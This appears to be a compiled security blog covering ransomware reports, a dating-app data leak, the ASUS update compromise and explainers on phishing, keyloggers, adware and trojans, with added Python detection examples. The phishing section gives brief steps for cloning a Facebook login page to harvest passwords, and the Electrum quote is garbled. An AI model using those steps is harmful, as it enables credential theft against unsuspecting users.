UNNAM3D Ransomware Locks Files in Password-Protected Archives, Demands Gift Cards

A new ransomware called Unnam3d R@nsomware is being distributed by email. It moves the victim's files into a password-protected RAR archive and demands a $50 Amazon gift card code in exchange for the archive password.
BleepingComputer was alerted after a victim submitted the ransomware to its site and asked for help. The victim said the ransomware arrived by email but did not provide a sample of the email.

When executed, the ransomware extracts a bundled WinRar.exe to the %Temp% folder and runs the command %Temp%\WinRar.exe -m -r -p[password] [directory] to move files into a password-protected archive in the specified directory.

During this process, the ransomware moves the files under the Documents, Pictures and Desktop folders into their own individual RAR archives. When it has finished, the ransom note screen appears.
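The behaviour described above (an archiver running from %Temp% with a password on its command line and a move of the source files) can be matched in process-creation logs. The following is an added example, not code from the article or from BleepingComputer; the event field names (Image, CommandLine) and all sample events are constructed assumptions.

```python
"""Flag process-creation events that match the archiving behaviour described above.

All events below are constructed samples. The field names (Image, CommandLine)
follow a common process-creation log layout and are an assumption.
"""
import ntpath
import re

ARCHIVERS = {"winrar.exe", "rar.exe"}
TEMP_DIR = re.compile(r"\\(?:temp|tmp)\\", re.IGNORECASE)
# -p<password> or -hp<password>; "-p-" (never prompt) is not a password.
PASSWORD_SWITCH = re.compile(r"^-h?p(?!-$)\S+", re.IGNORECASE)
# "-m" is the switch as the article prints it; "m"/"mf" are RAR's move commands
# and "-df" deletes the source files after archiving.
MOVE_TOKENS = {"-m", "m", "mf", "-df"}
USER_FOLDERS = re.compile(r"\\(?:documents|pictures|desktop)(?:\\|$)", re.IGNORECASE)


def tokenize(command_line):
    """Split a Windows command line, keeping quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def assess(event):
    """Return the list of indicators present in one process-creation event."""
    if ntpath.basename(event["Image"]).lower() not in ARCHIVERS:
        return []
    args = tokenize(event["CommandLine"])[1:]  # drop the program path
    findings = []
    if TEMP_DIR.search(event["Image"]):
        findings.append("archiver-in-temp")
    if any(PASSWORD_SWITCH.match(a) for a in args):
        findings.append("password-on-cmdline")
    if any(a.lower() in MOVE_TOKENS for a in args):
        findings.append("moves-source-files")
    if any(USER_FOLDERS.search(a) for a in args):
        findings.append("targets-user-folders")
    return findings


def is_suspicious(event):
    """Alert only on the combination; each indicator alone is common and benign."""
    required = {"archiver-in-temp", "password-on-cmdline", "moves-source-files"}
    return required <= set(assess(event))


EVENTS = [  # constructed sample events
    {"Image": r"C:\Users\alice\AppData\Local\Temp\WinRar.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\WinRar.exe" -m -r '
                    r'-pCONSTRUCTED "C:\Users\alice\Documents"'},
    {"Image": r"C:\Program Files\WinRAR\Rar.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\Rar.exe" a -r '
                    r'D:\backup\docs.rar C:\Users\alice\Documents'},
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\WinRAR.exe" a -pCONSTRUCTED '
                    r'report.rar report.docx'},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\Rar.exe",
     "CommandLine": r'"C:\Users\bob\AppData\Local\Temp\Rar.exe" x setup.rar C:\Tools'},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(is_suspicious(e), assess(e), e["CommandLine"])
```

Only the first event raises an alert; the scheduled backup, the password-protected report and the installer unpacking from %Temp% each show a single indicator and are left alone.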

How Does This Ransomware Spread?

As mentioned above, UNNAM3D ransomware can be distributed through e-mail spam with malicious attachments. The email is disguised as a message from Adobe saying that the recipient's Adobe Flash Player is out of date and must be updated. These messages contain a link to a fake Adobe Flash Player update, which is the UNNAM3D ransomware.
IOCs:
a98b678578e4d937de8a1f1557286da6df74abac0b49081829a81c886c3a92a3
Analysis report: VirusTotal.

More info: Bleeping Computer




5 Million User Profiles Exposed by Rela, a Chinese Lesbian Dating App

A popular gay and queer dating app, Rela, has exposed millions of user profiles and private data because a server was not password protected.


Victor Gevers, a security researcher from the Netherlands, found a database containing 5.3 million user profiles for Rela, a popular gay and queer Chinese dating app. The profiles included nicknames, birth dates, height, weight, ethnicity, sexual preferences, interests and, in some cases, location. The data was found on a server that was not password protected. Gevers believes that the user data has been exposed since June 2018.

More info: TechCrunch

Unfortunately, Google Promoted a Malicious Bitcoin Wallet on YouTube

According to a Reddit post published on March 26, the video-sharing platform YouTube reportedly ran a malicious ad for the Bitcoin (BTC) wallet Electrum by mistake.
Viewers who were interested in the ad were sent to a malicious link through a common scam method called typosquatting, or URL hijacking. The Reddit post, by a user named mrsxeplatypus, warned the public that a malware version of Electrum was being promoted and described how the scam ad worked:
The malicious ad is covered as a real Electrum ad (except a man whose Russian accent is distorted and who explains what to do). You even need to go to the correct link in the video (electrum.org), but you can start downloading the bad EXE file immediately when you click on the ad. As you can see in the image, electrum.org is the URL to which I have been sent, not electrum.org.

The Hard Fork, which reported this story, contacted Google to verify the advertisement. A representative answered the request and said that "appropriate action" was taken after the ad was reported to them.
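A download link can be checked against the domains a team actually trusts before anyone follows it. The following is an added example, not code from the Reddit post or from Electrum; every URL other than electrum.org is a constructed sample, and treating the last two labels as the registrable domain is a simplifying assumption (no public-suffix list).

```python
"""Classify a download URL against the domains a team actually trusts."""
from urllib.parse import urlsplit

TRUSTED = {"electrum.org"}  # the domain named in the article; extend with your own


def osa_distance(a, b):
    """Edit distance counting insert, delete, substitute and adjacent swap as 1."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i] + [0] * len(b)
        for j, cb in enumerate(b, 1):
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb))
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                cur[j] = min(cur[j], prev2[j - 2] + 1)
        prev2, prev = prev, cur
    return prev[len(b)]


def classify(url, trusted=TRUSTED, max_distance=2):
    """Return (verdict, detail) for the host a URL really points at."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")
    labels = host.split(".")
    if len(labels) < 2:
        return ("invalid", host)
    if parts.username is not None:
        # "https://trusted.name@other.host/": the real host follows the "@".
        return ("userinfo", host)
    registrable = ".".join(labels[-2:])  # assumption: two-label domains
    if registrable in trusted:
        return ("trusted", registrable)
    if any(label.startswith("xn--") for label in labels):
        return ("punycode", host)  # may render as look-alike characters
    for name in sorted(trusted):
        if host.startswith(name + ".") or ("." + name + ".") in host:
            return ("embedded", name)  # trusted name used as a subdomain
        sld, tld = name.split(".")
        distance = osa_distance(labels[-2], sld)
        if distance == 0 and labels[-1] != tld:
            return ("lookalike", name)  # same name under another TLD
        if 0 < distance <= max_distance:
            return ("lookalike", name)  # a few keystrokes away from the name
    return ("unknown", host)


URLS = [  # constructed samples, apart from the trusted domain itself
    "https://electrum.org/#download",
    "https://download.electrum.org/",
    "https://elcetrum.example/",
    "http://electrurn.example/",
    "https://electrum.example/",
    "https://electrum.org.wallet-update.example/setup.exe",
    "https://electrum.org@files.example/setup.exe",
    "https://xn--lectrum-constructed.org/",
    "https://example.com/",
]

if __name__ == "__main__":
    for u in URLS:
        print(classify(u), u)
```

With short names a distance of 2 produces false positives, so `max_distance` should be lowered for trusted names of only a few characters.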


ASUS Live Update Pushed Malware to 1 Million PCs

Taiwan-based technology giant ASUS is believed to have pushed malware to hundreds of thousands of customers through its trusted automated software update tool, after attackers compromised the company's server and used it to push the malware to machines.

The investigators estimate that half a million Windows machines received the malicious backdoor via the ASUS update server, but only about 600 of these systems appear to have been targeted. The malware searched for targeted systems by their unique MAC addresses. Once on a system, if it found one of these target addresses, the malware reached out to a command-and-control server operated by the attackers, which installed additional malware on those machines.
The security firm Kaspersky wrote a blog post about how hackers gained access to the ASUS Live Update Utility, the software update tool for ASUS notebooks and PCs, to install a backdoor on machines worldwide.

GandCrab Ransomware: How Does It Infect a PC?

GandCrab is a form of ransomware that has spread rapidly in recent years. Ransomware is one of the most serious cyber threats organizations currently face. Whether a company is large or small, hackers target the data that lives on its computer systems.

GandCrab is file-encrypting ransomware that encrypts the victim's personal documents using an RSA-2048 key, then displays a message saying that the data can be decrypted when a payment of $1200 (in Bitcoin or DASH) is made. The instructions are placed in *-DECRYPT.txt or *-DECRYPT.html files on the victim's desktop.

How Does It Infect a System?

GandCrab ransomware is distributed through spam emails containing infected attachments or links to malicious web sites. Cyber criminals send spam with forged headers to make you believe it came from a shipping company like DHL or FedEx. The email tells you they tried to deliver a package to you, but for some reason failed. Sometimes the emails claim to be shipping notifications. Either way, you can't resist being curious about what the email refers to, so you open the attached file (or click on a link inside the email). And with that, the GandCrab ransomware infects your computer.


















 

JNEC.a Ransomware Spreads via WinRAR ACE Exploit

A new ransomware called JNEC.a spreads by exploiting a recently reported ACE code execution vulnerability in WinRAR. After it encrypts the computer, it generates a Gmail address that victims must create in order to receive the decryption key once the ransom is paid.
Once running, the ransomware encrypts the files on the computer and appends the .Jnec extension to the original file name. The price of the decryption key is 0.05 bitcoins (around $200).
Although the address is given in the ransom note, it has not yet been registered. Registering it is left to the victims, if they wish to recover their files after paying the ransom.

The malware author also provides clear instructions on how to create the specific Gmail address, so that victims understand how to recover their data. These can be found in the JNec.README.TXT ransom note.
Researchers at the Qihoo 360 Threat Intelligence Center found the "vk 4221345.rar" archive in the wild. It delivers JNEC.a to systems running a vulnerable version of WinRAR, and the vulnerability is present in all versions released over the past 19 years.
IOCs:
RAR Archive: 551541d5a9e2418b382e331382ce1e34ddbd92f11772a5d39a4aeb36f89b315e
Ransomware: d3f74955d9a69678b0fabb4cc0e298fb0909a96ea68865871364578d99cd8025
File Path: %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\GoogleUpdate.exe

File analysis by VirusTotal and App.Any.Run
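An archive can be triaged by its content rather than its name before anyone opens it in WinRAR. The following is an added example, not code from the researchers; it assumes the delivered file is ACE-format data carrying a .rar name, checks the two SHA-256 values listed above, and runs on constructed header bytes that are not a working archive.

```python
"""Triage an archive by content instead of by its file name."""
import hashlib
import ntpath

# SHA-256 values listed in the IOCs above.
KNOWN_SHA256 = {
    "551541d5a9e2418b382e331382ce1e34ddbd92f11772a5d39a4aeb36f89b315e": "RAR archive",
    "d3f74955d9a69678b0fabb4cc0e298fb0909a96ea68865871364578d99cd8025": "ransomware",
}
# Lower-cased fragment of the Startup folder path given in the IOCs.
STARTUP = b"\\start menu\\programs\\startup\\"
MAGIC = [  # (offset, signature, format)
    (0, b"Rar!\x1a\x07\x01\x00", "rar5"),
    (0, b"Rar!\x1a\x07\x00", "rar4"),
    (0, b"PK\x03\x04", "zip"),
    (0, b"7z\xbc\xaf\x27\x1c", "7z"),
    (7, b"**ACE**", "ace"),
]


def sniff_format(data):
    """Identify the archive format from its leading bytes."""
    for offset, signature, name in MAGIC:
        if data[offset:offset + len(signature)] == signature:
            return name
    return "unknown"


def triage(file_name, data):
    """Return findings for one file: IOC hash match, ACE content, odd paths."""
    findings = []
    digest = hashlib.sha256(data).hexdigest()
    if digest in KNOWN_SHA256:
        findings.append("known-ioc:" + KNOWN_SHA256[digest])
    if sniff_format(data) == "ace":
        findings.append("ace-format")
        extension = ntpath.splitext(file_name)[1].lower()
        if extension != ".ace":
            findings.append("extension-mismatch:" + extension)
        # ACE headers store member names uncompressed, so a byte search works.
        if STARTUP in data.lower():
            findings.append("member-path-in-startup-folder")
    return findings


def constructed_ace_header(member_name):
    """Constructed demo bytes: ACE magic at offset 7 followed by a member name."""
    return b"\x00" * 7 + b"**ACE**" + b"\x00" * 16 + member_name.encode("ascii")


SAMPLES = [  # constructed; only the first file name comes from the article
    ("vk 4221345.rar", constructed_ace_header(
        r"Microsoft\Windows\Start Menu\Programs\Startup\GoogleUpdate.exe")),
    ("holiday.ace", constructed_ace_header(r"photos\beach.jpg")),
    ("photos.rar", b"Rar!\x1a\x07\x01\x00" + b"\x00" * 32),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(name, sniff_format(data), triage(name, data))
```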











What Is Phishing? How Does It Attack Your System?

Phishing scams use links to steal your important information. It might be an e-mail that looks like it was sent by a bank, or a link that appears to require you to sign into your account again. In this case, the sender gains access to your accounts and important information by directing you to a website or link where you enter your account details.
Phishing is one of the most effective ways of stealing usernames and passwords from people. In this attack, a realistic copy of any login page can be created.
Phishing Attack Example:
  • Go to the Facebook website login page.
  • Right-click on the page and select view page source.
  • Copy the code to your notepad.
  • Change the GET & POST method actions in the copied code.
  • Write your hosting address in the methods.
  • Get a free web hosting account.
  • When the user tries to log in, the username and password go to your account, and the user is sent on to the original Facebook page by some HTML tricks.
  • This is only for reading and as an example. Don't try this trick; it is illegal activity.
This trick gives scammers access to your account information, so carefully check every website link before you use it.
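A copied login page gives itself away in where its form sends the password. The following is an added example, not code from the original page, that audits the login forms of a fetched page against a brand's real domains; the page URLs, the HTML snippets and the `brand_domains` parameter are constructed assumptions.

```python
"""Audit the login forms on a fetched page against the brand's real domains."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect each <form>: its action, method and whether it asks for a password."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open = {"action": attrs.get("action") or "",
                          "method": (attrs.get("method") or "get").lower(),
                          "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def host_in(host, domains):
    """True when host is one of the domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in domains)


def audit_login_forms(page_url, html, brand_domains):
    """Return one finding per password form: where it posts and what is wrong."""
    collector = FormCollector()
    collector.feed(html)
    page_host = urlsplit(page_url).hostname or ""
    findings = []
    for form in collector.forms:
        if not form["password"]:
            continue  # search boxes and the like are not login forms
        target = urljoin(page_url, form["action"])  # empty action posts to the page
        parts = urlsplit(target)
        issues = []
        if not host_in(page_host, brand_domains):
            issues.append("page-not-on-brand-domain")
        if not host_in(parts.hostname or "", brand_domains):
            issues.append("credentials-leave-brand-domain")
        if parts.scheme != "https":
            issues.append("credentials-sent-without-tls")
        if form["method"] == "get":
            issues.append("password-in-query-string")
        findings.append({"target": target, "issues": issues})
    return findings


BRAND = {"facebook.com"}
# Constructed pages: a genuine login page, a copy on free hosting, and a
# genuine page whose form has been replaced (content injection).
GENUINE = ('<form action="/search"><input name="q"></form>'
           '<form action="/login/submit" method="post"><input name="email">'
           '<input type="password" name="pass"></form>')
COPIED = ('<form action="save.php" method="get"><input name="email">'
          '<input type="password" name="pass"></form>')
INJECTED = ('<form action="https://collector.example/in" method="POST">'
            '<input type="PASSWORD" name="pass"></form>')

if __name__ == "__main__":
    print(audit_login_forms("https://www.facebook.com/login/", GENUINE, BRAND))
    print(audit_login_forms("http://free-hosting.example/fb/index.html", COPIED, BRAND))
    print(audit_login_forms("https://www.facebook.com/help", INJECTED, BRAND))
```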


What Is a Phishing Attack?

Phishing is a type of social engineering attack that is often used to steal user data, including login credentials and credit card numbers. It happens when an attacker, masquerading as a trustworthy entity, dupes a victim into opening an email, instant message or text message. The recipient is then tricked into clicking a malicious link, which can lead to malware installation, system freezing as part of a ransomware attack, or the disclosure of sensitive information.
The results of an attack may be devastating. For individuals, this includes unauthorized purchases, stolen money or theft.

Types of Phishing Attacks:

Some phishing techniques attackers use:
  • Deceptive phishing: A deceptive email message is the most common method today. Messages about the need to verify account information, system failure requiring users to re-enter their information, fictitious account charges, undesirable account changes, new free services requiring quick action, and many other scams are broadcast to a wide group of recipients in the hope that the unwary will respond by clicking a link to, or signing onto, a bogus site where their confidential information can be collected.
  • Malware-based phishing: This covers scams that involve malicious software running on users' PCs. Malware can be introduced as an e-mail attachment, as a file downloaded from a website, or by exploiting known security vulnerabilities.
  • Keyloggers & screenloggers: These are malware that track keyboard input and send the relevant data to the hacker over the internet.
  • Session hijacking: This attack monitors users' activities until they sign in to a target account or transaction and establish their genuine credentials. At that stage the malicious software takes over and can take unauthorized steps, such as transferring funds, without the user's knowledge.
  • Web Trojans: These pop up invisibly when users try to log in. They collect the user's credentials locally and send them to the hacker.
  • System reconfiguration: These attacks change the settings on the user's PC for malicious purposes.
  • DNS-based phishing ("pharming"): This is the term for tampering with the hosts file or the Domain Name System (DNS). Hackers manipulate hosts files or the domain name system so that requests for URLs or name services return a bogus address, and the user's communication with the company is then directed to a false site.
  • Content-injection phishing: This describes the situation in which hackers replace a portion of a site's content with false content in order to mislead the user into giving confidential information to the hacker.
  • Man-in-the-middle phishing: In these attacks, hackers place themselves between the user and the legitimate website or system. They record the information being entered but continue to pass it on, so that the user's transactions are not affected.
  • Search engine phishing: Phishers create websites with attractive offers and have them legitimately indexed by search engines. Users find the sites in the normal course of searching for products or services and are fooled into giving up their information.

Phishing Prevention Best Practices:

  1. Know how to identify phishing scam mail: The email you receive may seem legitimate because it carries the real image of the company, but it is best to research the company before you believe anything in it.
  2. Check the source of the mail: If you get mail from a financial institution such as a bank, remember that it will never ask you to send confidential information like passwords or account details. Instead of answering the questions, it is best to call the bank, on the number you have, to find out whether they sent the mail.
  3. Never click on the links in an e-mail: They might be fake links to a website that may be harmful. It is better to type the web address yourself than to click on it.
  4. Check that the website is secure: Before entering any data on a website, it is best to check whether the website is secure enough to trust. The easy way is to see whether or not the URL shows the green padlock.
  5. Phishing is not restricted to online banking: Phishing attacks are usually carried out to obtain bank details, but they are not limited to that. Some of these cyber criminals also target other popular websites such as Facebook, PayPal, eBay and Amazon.
  6. Update your computer security: Do not compromise on security. Always keep your computer's security software up to date, since it is very useful for blocking frequent attacks of this kind.
  7. Regularly monitor your accounts: It is best to check your bank accounts from time to time so that you know whether each transaction is one you made.
  8. Phishing attacks can be carried out in any language: Phishing emails are not only sent in English but can be sent in various languages. Be careful if you find mail in a language you don't know, or from a website in that language that you have never visited.
  9. Trust your instinct: If you have any doubts about a mail, it most likely is a phishing mail.
  10. Keep yourself up to date: Several blogs and articles are written daily, and it is best to stay updated on the latest attacks and scammers through blogs, news or social media platforms such as Facebook or Twitter.


What Is a Keylogger?


A keylogger is software that tracks and records keystrokes and sends them out by e-mail.
A keylogger is spyware that is installed on a computer, or a spy device that is connected to the computer. A basic keylogger saves all text typed on the computer's keyboard. Advanced models have more features, such as taking screenshots, sending email reports, and recording browsing history and apps.
Most people define a keylogger as software that secretly tracks and logs all keystrokes on a computer.

How a Keylogger Gets Installed:

It can be installed simply as a piece of software, sent by e-mail, or arrive as a .jpg file.

How does it work:

  1. A keylogger is a very small program which runs in the background without the owner's knowledge, saving all keystrokes from the keyboard.
  2. It sends the keystroke log file to a specific email address or server.
  3. There is a "master key" for accessing the keylogger, which is a combination of multiple keystrokes.
  4. When you open www.gmail.com in your browser, you will obviously then enter your email ID and password. The keylogger then sends those keystrokes to the predefined address.
  5. Therefore, someone with basic computer knowledge can easily obtain the email ID and password.

How Do You Get a Keylogger?

Keyloggers spread in much the same way as other malicious programs. Except when a keylogger is bought and installed by a jealous spouse or partner, or used by security services, keyloggers are installed on your system when you open a file attachment that you receive via email, text message, P2P networks, instant message, or social networks. Keyloggers can also be installed simply by visiting an infected site.

How to protect against keyloggers:


  1. Use one-time passwords or two-step authentication.
  2. Use a proactive protection system to detect malicious programs.
  3. Use a virtual keyboard.
  4. Keep changing your passwords.
  5. Use a firewall.
  6. Install a good antivirus product with the latest virus definitions.
  7. Don't download and use freeware software.


What Is PUA or PUP Software?

PUA means potentially unwanted application and PUP means potentially unwanted program; they are basically the same. Both mainly get onto the computer without the user's consent. They sometimes come bundled with freeware software.

PUAs and PUPs are also called adware. They display unwanted ads and redirect your browser to unwanted websites and undesirable search engines. Some also run several background processes, slowing down the PC or showing several ads.
To avoid installing such PUAs or PUPs, always install software by selecting the advanced/custom options. Clicking the Next or Quick install button may install software on your computer that you do not want.
This kind of installer installs unwanted programs, such as a search engine and a search toolbar in the browser, along with other programs you don't know about or want.
Some signs that your PC is infected with PUA or PUP malware:
  • Slow PC speed.
  • Unwanted ads are shown.
  • The browser is redirected.
  • The browser search engine is changed and redirected.
  • Unwanted pop-ups are shown.
  • Freeware installers show offer pop-ups and install unwanted toolbars in the browser.
PUA and PUP Prevention Tips:
  • Don't download and use freeware software.
  • Use an up-to-date antivirus.
  • Use up-to-date software.
  • Don't visit malicious URLs.
  • Remove unwanted browser toolbars.
  • Don't open phishing mail and URLs.

How to Prevent Ransomware?

What Is Ransomware?

Ransomware is malicious software that encrypts files and locks devices, such as a computer, tablet or smartphone, and then demands a ransom to unlock them. Recently, a dangerous ransomware called 'WannaCry' affected computers around the world, creating the world's largest ransomware attack ever seen.
Ransomware shows a ransom note. The ransom is usually demanded in cryptocurrency, at a price that increases after one or more deadlines. If the victim fails to pay by the final deadline, the data stays encrypted forever.
The Cause of Ransomware

Usually the main cause of hacks is human error. Some employees may not know what suspicious emails look like and can give hackers immediate access to sensitive data and company servers simply by following a fake link and entering personal details.

Ransomware Prevention Tips
Preparing your machine with the following tips is the best way to prevent ransomware from hitting your computer:

  • Back up your system daily and create a restore point.
  • Use up-to-date versions of Chrome or Firefox.
  • Keep Adobe software updated.
  • Don't open attachments from sources you don't know.
  • Don't open PDFs from sources you don't know.
  • Do not open attachments with these extensions: exe, com, lnk, mhf, bat, ps1, scr.
  • Do not open suspicious or phishing emails.
  • Don't use pirated software.
  • Keep macros disabled.
  • Disable Flash and Java.
  • Always have an antivirus installed on your computer and keep it updated.
  • Do not pay the ransom, even when locked out.

How to Get Rid of a Browser Hijacker?

What Is a Browser Hijacker?


A browser hijacker is a small piece of software that mostly attacks popular browsers such as Mozilla Firefox, Google Chrome and Internet Explorer. Once it gets in, this nasty infection alters your searches and displays error pages in your browser. It also redirects the user to its own page, which the user had no intention of visiting.

Browser hijackers change your browser settings without your knowledge. This is usually done for the purpose of malicious advertising, or malvertising for short.

Browser hijackers may even include other malicious software, such as spyware or keyloggers, capable of recording and transmitting your sensitive information, such as your banking data and credentials online. They can also divert your browsing traffic to malicious websites that are filled with quizzes, surveys, and raffles used to acquire your personal information.

How Do Browser Hijackers Infect Your Computer?

Browser hijacking software can sneak onto a computer in a variety of ways. It can be installed through free software "add-ons", malicious websites, ad clicks and browser extensions.
These are the effects on your browser:
  1. It feeds you many pop-ups and malvertising ads.
  2. It changes your browser to a new website. For instance, it changes your default homepage from Google to another search engine.
  3. It constantly returns you to a specific website, like an online store. This is known as DNS redirection.

Signs Your Browser Has Been Hijacked   

Signs of a browser hijacker infection on your computer include:
  1. The home page has been modified.
  2. The default search engine has been changed.
  3. You cannot navigate to certain web pages, such as the home pages of security software.
  4. You are redirected to pages you never intended to visit.
  5. You see advertisements or pop-ups on your screen that do not come from the website you are visiting.
  6. New toolbars have been added.
  7. New favorites or bookmarks have been added.
  8. Your web browser runs slowly.

Known browser hijackers:

1. Mindspark Toolbar


Mindspark Toolbar is a browser extension that is bundled onto the PC without the user's permission.
Mindspark Toolbar changes your search engine to Ask and replaces search results. While you browse, Mindspark Toolbar can display many ads, coupons and banners. It collects information and analyzes it covertly. It may transfer your personal information to third parties.
You must immediately uninstall Mindspark Toolbar if you find it on your PC!

2. Babylon Toolbar

In 2011, the Babylon Toolbar began to circulate. The CNET website, download.com, started to bundle the software with downloads without the developer's consent. The Babylon Toolbar changed the default browser homepage to search.babylon.com and infected other browsers on the machine. The Babylon Toolbar is now available.


The toolbar was a form of adware: it displayed ads in search results and collected money from sponsored links. If you find the Babylon Toolbar on your PC, you must uninstall it immediately!


3. Conduit


Conduit Toolbar is a browser hijacker which is promoted through bundles with third-party apps. It adds the Conduit Toolbar and changes the user's browser homepage and default search engine to "search.conduit.com". This indicates an attempt to access Conduit Toolbar.
You must immediately uninstall Conduit Toolbar if you find it on your PC.

Some Other Popular Browser Hijackers:

  • MySearch
  • CoolWebSearch
  • Nationzoom.com
  • Qvo6.com
  • Delta Search
  • OneWebSearch
  • Searchnu.com
  • astromenda.com
  • Snap.do

What Is Adware? How Does It Infect Your System?



Adware Definition:

Adware is a type of malware. Adware is software that displays unwanted ads. It may also be another kind of free software that is supported by advertisements, which usually appear on your computer or browser in a pop-up window. Most adware is annoying but safe. But some is used to collect your personal information, track the websites you visit, or even record your keystrokes.

Where Adware Generally Comes From

Like other malware, adware is generally bundled with free software, but it can also be installed through a security hole in your browser or operating system.


Here are a few typical signs of adware on your system:

  • Advertisements appear in places where they are not supposed to be.
  • Your web browser's homepage has changed unexpectedly without your permission.
  • The web pages you typically visit are not displayed properly.
  • Website links redirect to sites other than what you expected.
  • Your web browser slows to a crawl.
  • Your browser suddenly gets new toolbars, extensions or plugins.

How to Prevent Adware?

Here are some things to do and to avoid:
  • Don't use freeware software.
  • Update Windows from time to time.
  • Don't browse malicious web sites.
  • Use an anti-malware tool, keep it updated and scan the system daily.
  • Don't install unwanted software.

What Is a Trojan Virus? How Does It Infect a PC?

A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users' systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system.
These actions can include:
  • Deleting data
  • Blocking data
  • Modifying data
  • Copying data
  • Disrupting the performance of computers or computer networks
Unlike computer viruses and worms, Trojans are not able to self-replicate.

     

Uses of a Trojan horse
When a Trojan horse becomes active, it puts sensitive user data at risk and can negatively impact performance. Once a Trojan has been transferred, it can:
  • Give the attacker backdoor control over the computing device.
  • Record keyboard strokes to steal the user's account data and browsing history.
  • Download and install a virus or worm to exploit a vulnerability in another program.
  • Install ransomware to encrypt the user's data and extort money for the decryption key.
  • Activate the computing device's camera and recording capabilities.
  • Turn the computer into a zombie bot that can be used to carry out click fraud schemes or illegal actions.
  • Legally capture information relevant to a criminal investigation for law enforcement.  
Trojans are classified according to the type of action they can perform on a PC.
  1. Backdoor: A backdoor, in computing, is a method of bypassing authentication in a piece of software or computer system, which can be used for accessing the software without being detected. Backdoors are a subcategory of Trojans, and Trojans are a category of malware. Web server backdoors are used for a number of malicious activities, including:
  • Data theft
  • Website defacing
  • Server hijacking
  • The launching of distributed denial of service (DDoS) attacks
  • Infecting website visitors (watering hole attacks)
  • Advanced persistent threat (APT) assaults.

Top 8 Symptoms That Show Your PC Is Infected with Malware

Do you know how to tell if your computer has a virus? Sometimes there's no way to be sure, but often computers give hints that something isn't right. Check your computer for the symptoms below to make sure it is secure and not at risk from a virus.

Here are some signs that your device might already be infected with malware:

1. Slower Internet and Processing

A slower computer doesn't necessarily mean you have a virus, but if it's a sudden enough change in speed, it may be worth checking out. Use a speed test to check your internet speed and use your computer's task manager to measure processing power. If either seem slower than usual, perform a scan with your antivirus software.

2. Unexpected Computer Behavior

Viruses can do all kinds of strange things to your computer. If your computer stops responding to clicks, decides to open files on its own, scrolls or acts as if a key's been pressed when it hasn't, you may be experiencing computer virus symptoms. Your computer shouldn't seem like it's thinking for itself.

3. Sudden Freezes & Crashes

Because viruses damage your hard drive, they can cause your computer to experience a catastrophic failure. If you're lucky enough that your computer still turns on after a crash, make sure to run antivirus software to determine whether a virus was the cause.

4. Error Messages

Your computer knows something is wrong before you do. One of the most noticeable symptoms of a computer virus is the sudden appearance of pop-up messages warning you about missing system or application files. Research messages by putting them in a search engine to see if you can diagnose a virus.

5. Advertisements

It's common to see ads as you browse the internet, but if you start seeing them when you're not actively browsing, that is a telltale sign of a virus. Do not click on these ads, even if they say they are for antivirus software.

6. Outgoing Emails

Viruses try to spread themselves by email. If you notice emails in your sent box that you didn't send, you probably have a virus. If you get an email from a friend that seems suspicious, they might have a virus. Do not click on any links or open any attachments in questionable emails.

7. Missing or Extra Files

Keep track of the size of your hard drive. A virus may install copies of itself or unwanted files on your computer. Viruses also delete files unexpectedly. When you start seeing something strange or missing, it's time to run a virus scan.

8. Hardware and Accessory Problems

If you suddenly have a problem with your computer's display, such as mixing pixels or color problems, this can be a sign of a virus messing with your system. A networked printer may also start acting up if it becomes infected.

If you notice any of these, first, don’t panic. It’s not 100% that you have a virus. However, you should check things out. Make sure your antivirus program is scanning your computer regularly and set to automatically download software updates. This is one of the best lines of defense you have against malware.

Computer Virus

What Is a Computer Virus? How Does It Infect Your PC?


A computer virus is a malicious software program ("malware") that is loaded onto a user's computer without the user's knowledge and performs malicious actions. It can infect a computer by modifying or deleting data files or the boot sector of a hard disk drive, or by causing a software program to work in an unexpected manner.
A computer virus resides on a host computer and can replicate itself when executed. A virus can steal user data, delete or modify files and documents, and record a user's keystrokes and web sessions. It can also steal or damage hard disk space and slow down CPU processing.

Some Different Types of Viruses:

  1. Boot Sector Virus: This virus infects the system boot sector and removes boot programs.
  2. File Viruses: A file-deleting virus is designed to delete critical files that are part of the operating system, or data files.
  3. Macro Virus: These viruses are triggered when a program capable of executing a macro is run. For example, a macro virus can be contained in spreadsheet files. These are written in a high-level language like Visual Basic.
  4. Browser Hijacker: This virus changes your browser home page, redirects you to other pages and shows unwanted pop-ups and ads.
  5. FAT Virus: FAT viruses ruin your file allocation system, which is where information about files and where to find them is stored. They can even destroy files and the entire directories for them.
  6. Multipartite Virus: This type of virus is able to infect multiple parts of a system, including the boot sector, memory and files. This makes it difficult to detect.